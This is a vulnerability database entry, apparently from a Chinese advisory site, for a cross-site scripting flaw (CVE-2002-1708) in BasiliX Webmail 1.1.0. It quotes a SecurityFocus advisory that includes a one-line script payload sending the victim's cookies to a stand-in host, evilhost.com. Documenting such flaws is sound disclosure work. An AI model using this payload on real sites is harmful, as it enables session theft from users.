BasiliX Webmail消息内容脚本注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106808 漏洞类型 跨站脚本
发布时间 2002-06-19 更新时间 2006-09-22
CVE编号 CVE-2002-1708 CNNVD-ID CNNVD-200212-327
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/21570
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-327
|漏洞详情
BasiliXWebmail1.10版本存在跨站脚本攻击(XSS)漏洞。远程攻击者如其他用户一样通过向(1)subject或(2)消息字段注入脚本执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5060/info

BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.

A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.

This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.

<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>
|参考资料

来源:XF
名称:basilix-webmail-headers-css(9384)
链接:http://xforce.iss.net/xforce/xfdb/9384
来源:BID
名称:5060
链接:http://www.securityfocus.com/bid/5060
来源:VULNWATCH
名称:20020619[VulnWatch]BasiliXmultiplevulnerabilities
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0117.html